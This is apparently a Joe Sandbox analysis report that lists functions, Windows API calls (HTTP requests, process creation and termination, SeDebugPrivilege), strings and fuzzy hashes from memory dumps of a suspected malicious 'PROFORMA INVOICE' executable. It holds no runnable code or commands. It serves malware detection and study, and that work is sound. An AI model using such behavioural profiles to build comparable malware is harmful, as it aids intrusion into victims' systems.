Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ceb549ae4e1dc5c17fa034577117bfc5912a3fd6bdbc6c259a2e69b5f0b977ae
Instruction ID: 9223c88ee4a61b5125a2d0a1d8a81ad4dd2c25a4ed3914fe62338cd227616138
Opcode Fuzzy Hash: ceb549ae4e1dc5c17fa034577117bfc5912a3fd6bdbc6c259a2e69b5f0b977ae
Instruction Fuzzy Hash: 6A914B34600202CFC715EF14C999B68F3B4FF15704F5482AAE50AAB262DF34AE5AEF50

Function 00F7CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F7CC15

Part of subcall function 00F7CCCD: GetClientRect.USER32(?,?), ref: 00F7CCF6
Part of subcall function 00F7CCCD: GetWindowRect.USER32(?,?), ref: 00F7CD37
Part of subcall function 00F7CCCD: ScreenToClient.USER32(?,?), ref: 00F7CD5F

GetDC.USER32 ref: 00FDD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FDD14A
SelectObject.GDI32(00000000,00000000), ref: 00FDD158
SelectObject.GDI32(00000000,00000000), ref: 00FDD16D
ReleaseDC.USER32(?,00000000), ref: 00FDD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FDD200

Strings

U, xrefs: 00FDD0D5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7f3655141f0aece24e4bdb741de9b8ad5676035f46dc96e67cd047bbca000bfb
Instruction ID: cc9351d0a6d062a276eb873e3aae9a30ca6d9b4dfcf1f75e7aeaa8603620a0a9
Opcode Fuzzy Hash: 7f3655141f0aece24e4bdb741de9b8ad5676035f46dc96e67cd047bbca000bfb
Instruction Fuzzy Hash: 3471E231800209DFDF219F64CC85AAA7BB6FF89364F18826BED595A295C7318841FF51

Function 00FB45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FB45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FB462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00FB466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FB4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00FB46BF
InternetCloseHandle.WININET(00000000), ref: 00FB4706

Part of subcall function 00FB5052: GetLastError.KERNEL32(?,?,00FB43CC,00000000,00000000,00000001), ref: 00FB5067

Strings

, xrefs: 00FB46B8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 6f6dc474eca080b898f6f70ded0a69163316064fd602a93397a5f04fed012c7f
Instruction ID: 710e204d85ed467678066093c7fed62eda3e1a57c03cebf20071eee860f3c248
Opcode Fuzzy Hash: 6f6dc474eca080b898f6f70ded0a69163316064fd602a93397a5f04fed012c7f
Instruction Fuzzy Hash: 60418EB1901209BFEB119F51CD85FFA77ADFF09354F004016FA019A182D7B4A944ABA4

Function 00FBB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00FFDC00), ref: 00FBB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00FFDC00), ref: 00FBB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FBB8C1
SysFreeString.OLEAUT32(?), ref: 00FBB8EB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 2fddc2e36be8d7425ea2b4b23d73bae610010221a4cb9047d3f7d145da7ca239
Instruction ID: 231cca90a861e36083e7c2d0143b2f5d9e79953a2e979208ab3568769b893cae
Opcode Fuzzy Hash: 2fddc2e36be8d7425ea2b4b23d73bae610010221a4cb9047d3f7d145da7ca239
Instruction Fuzzy Hash: DDF11575E00209AFCB04DF95C888EEEB7B9FF49315F108498E905AB250DB75AE42DF90

Function 00FC24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FC24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FC2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FC26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FC26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FC270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FC286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FC28A1
CloseHandle.KERNEL32(?), ref: 00FC28D0
CloseHandle.KERNEL32(?), ref: 00FC2947

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 37d8d9631f8d0ea1d6a64d6a4af23f0ee8d39655053b1d27a5c8cec565f22e38
Instruction ID: 2f91e138a6962e664e3929297c04d5384264d7b947bf60dcfe38e8750965d63b
Opcode Fuzzy Hash: 37d8d9631f8d0ea1d6a64d6a4af23f0ee8d39655053b1d27a5c8cec565f22e38
Instruction Fuzzy Hash: F9D1BF35604201DFCB14EF24C992F6ABBE5EF85320F18885DF8999B2A1DB35DC44EB52

Function 00FCB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FCB3F4

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 393d34fd4192d241eb5018c381e8f3d0e2590dea8258e9f328bd13b21c4bf687
Instruction ID: 8bdec20d59e6deef0d6457c7b91ed1d36e8ce8d67ff248ec490f99c1095672e5
Opcode Fuzzy Hash: 393d34fd4192d241eb5018c381e8f3d0e2590dea8258e9f328bd13b21c4bf687
Instruction Fuzzy Hash: 0251E23890424ABBEF349F28CE8BFAD3B64BB05324F24441AF614D61E2C775E944BB51

Function 00F7A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FDDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FDDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FDDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FDDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FDDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00F7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00FDDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FDDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00F7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00FDDBC8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: c2705b53f0d164f222244718300f380b85aef09bd1713f5d378114958818e172
Instruction ID: bfabdd6fdf5b7a5d254053461eacdd9fb88ab02c4fa20c276f3a26251a540a75
Opcode Fuzzy Hash: c2705b53f0d164f222244718300f380b85aef09bd1713f5d378114958818e172
Instruction Fuzzy Hash: 92517D70A00208EFDB24DF64CC81FAE37B5BB88764F15451AF94A9B6D0D7B4AC80EB51

Function 00FA7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FA5FA6,?), ref: 00FA6ED8

Part of subcall function 00FA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FA5FA6,?), ref: 00FA6EF1

Part of subcall function 00FA72CB: GetFileAttributesW.KERNEL32(?,00FA6019), ref: 00FA72CC

lstrcmpiW.KERNEL32(?,?), ref: 00FA75CA
_wcscmp.LIBCMT ref: 00FA75E2
MoveFileW.KERNEL32(?,?), ref: 00FA75FB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: e5c75c4c5cfff229d0049fd3cdf741bdbe475e5dc384cf433a2f53d92eed3d66
Instruction ID: d30d63e9294b4b2dcafaff0aa207de9a7c56857b2a2bf9acc42c93cb3f616dea
Opcode Fuzzy Hash: e5c75c4c5cfff229d0049fd3cdf741bdbe475e5dc384cf433a2f53d92eed3d66
Instruction Fuzzy Hash: AC510CF2E092199EDF50FA94DC81DDE73BCAF09320B4041AAFA05E3541EA7496C9DB64

Function 00F7EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00FDDAD1,00000004,00000000,00000000), ref: 00F7EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00FDDAD1,00000004,00000000,00000000), ref: 00F7EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00FDDAD1,00000004,00000000,00000000), ref: 00FDDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00FDDAD1,00000004,00000000,00000000), ref: 00FDDCF2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: da567aac357fb6216bb46114bd31f98041050c076c0f68e1a09e717d5ab601c8
Instruction ID: 61a7a23998f193cf445eee417bed8c39e4fb63d0376be4b426129f076ff474ec
Opcode Fuzzy Hash: da567aac357fb6216bb46114bd31f98041050c076c0f68e1a09e717d5ab601c8
Instruction Fuzzy Hash: 9541D971A152809AD7354B2C8DCDB2A7F96EBD9324F1D848FE08F86A51C6757880F713

Function 00F9B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F9AEF1,00000B00,?,?), ref: 00F9B26C
HeapAlloc.KERNEL32(00000000,?,00F9AEF1,00000B00,?,?), ref: 00F9B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F9AEF1,00000B00,?,?), ref: 00F9B288
GetCurrentProcess.KERNEL32(?,00000000,?,00F9AEF1,00000B00,?,?), ref: 00F9B290
DuplicateHandle.KERNEL32(00000000,?,00F9AEF1,00000B00,?,?), ref: 00F9B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F9AEF1,00000B00,?,?), ref: 00F9B2A3
GetCurrentProcess.KERNEL32(00F9AEF1,00000000,?,00F9AEF1,00000B00,?,?), ref: 00F9B2AB
DuplicateHandle.KERNEL32(00000000,?,00F9AEF1,00000B00,?,?), ref: 00F9B2AE
CreateThread.KERNEL32(00000000,00000000,00F9B2D4,00000000,00000000,00000000), ref: 00F9B2C8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: d7c3e9a75cabbb2c26b6fd8a2ef77cf90ac41cb1a465e7f6125e4b969a5a6cb7
Instruction ID: 5d566de0171ed87fc872d703321628c4a5f9c61bf71043f3ad8c9f801815d91e
Opcode Fuzzy Hash: d7c3e9a75cabbb2c26b6fd8a2ef77cf90ac41cb1a465e7f6125e4b969a5a6cb7
Instruction Fuzzy Hash: 1101B6B5240348BFEB10ABA5DD89F6B7BACEB88711F018411FA15DF5A1CA759800DB61

Function 00FBC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00FBC876, 00FBC887
Not an Object type, xrefs: 00FBC49E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 6191ee410d32e5f10a2db5437a0156ae5b7408702eba024821dba5fcca3d1794
Instruction ID: c37fec6f21450a4ab4beaa2d22c29be6d36739af7e404de912d0d82c14f993ef
Opcode Fuzzy Hash: 6191ee410d32e5f10a2db5437a0156ae5b7408702eba024821dba5fcca3d1794
Instruction Fuzzy Hash: 6DE18D71E00219ABDF14DFA9CC85AEF77B5AB48324F148029F905AB281D774ED41AF90

Function 00FBBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FBBB5C
VariantInit.OLEAUT32(?), ref: 00FBBC2D
VariantInit.OLEAUT32(?), ref: 00FBBD2E
VariantClear.OLEAUT32(?), ref: 00FBBD38
VariantClear.OLEAUT32(?), ref: 00FBBD99

Strings

Null Object assignment in FOR..IN loop, xrefs: 00FBBBBD, 00FBBCEB, 00FBBDA7
Incorrect Object type in FOR..IN loop, xrefs: 00FBBD11

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 978ea59e95a79c046fbc0e7683abcc335081da567684e60179dd4a986382a303
Instruction ID: bce3bd71e6c430d54d35f35070566aa62f83276118ce7a1d3baee533c609f738
Opcode Fuzzy Hash: 978ea59e95a79c046fbc0e7683abcc335081da567684e60179dd4a986382a303
Instruction Fuzzy Hash: 57917F71E00219ABDB24DF96CC44FEEBBB8EF49720F108559F515AB280DBB49944DFA0

Function 00FC9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FC9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00FC9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FC9B47
_wcscat.LIBCMT ref: 00FC9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00FC9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FC9BE7

Strings

SysListView32, xrefs: 00FC9AEB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 0948b14b5059df4403bb21035ca48f979c2281d6742f97b71925a4ac578933c4
Instruction ID: 10b9711e87ec97226948ffc4ecc0d9b2b45c2085547e4221789b9bb9a2ada8d2
Opcode Fuzzy Hash: 0948b14b5059df4403bb21035ca48f979c2281d6742f97b71925a4ac578933c4
Instruction Fuzzy Hash: 9341B271904309ABDB219F64CD8AFEE77A8EF08360F10442AF585E7291C7B59D84EB60

Function 00FC172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00FA6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FA6554
Part of subcall function 00FA6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FA6564
Part of subcall function 00FA6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FA65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FC179A
GetLastError.KERNEL32 ref: 00FC17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FC17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00FC1855
GetLastError.KERNEL32(00000000), ref: 00FC1860
CloseHandle.KERNEL32(00000000), ref: 00FC1895

Strings

SeDebugPrivilege, xrefs: 00FC17B8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7c819d5cdbb91668d5bcc4e388d7e0a42ff9f974e87d21a0d50e2fe669efec4e
Instruction ID: f2eec79a262eed26691c906da668844cd090c8dbb1dfe940ec0386fb52ddd4a4
Opcode Fuzzy Hash: 7c819d5cdbb91668d5bcc4e388d7e0a42ff9f974e87d21a0d50e2fe669efec4e
Instruction Fuzzy Hash: 58419C72600201AFEB05EF54CEA6F6DB7A5AF55310F04805DF9069F3D2DB79A900EB91

Function 00FA5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00FA58B8

Strings

question, xrefs: 00FA5871
info, xrefs: 00FA5859
warning, xrefs: 00FA58A1
stop, xrefs: 00FA5889
blank, xrefs: 00FA583A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: b1a5b7ebe28a66bc7a28e2675507d37378283379c34acb48513bedb58192962c
Instruction ID: 9a9dc163aa11a7076e224e42f202fef8f8fdc849a3b25938c191caada522ced8
Opcode Fuzzy Hash: b1a5b7ebe28a66bc7a28e2675507d37378283379c34acb48513bedb58192962c
Instruction Fuzzy Hash: DC110DB3709746BAE7055B55DC82DAE339CEF16B34B20403AF640ED281E76CA9046364

Function 00FAA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00FAA806

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: a313c46296f0be56a85948fb9ec1107d4de7ab8c8e97267109b156876d713378
Instruction ID: ee38b8696c9c8d14bedb76d1d948d4ff09e3eddd7f1ddcdeabd4adc59e3813d0
Opcode Fuzzy Hash: a313c46296f0be56a85948fb9ec1107d4de7ab8c8e97267109b156876d713378
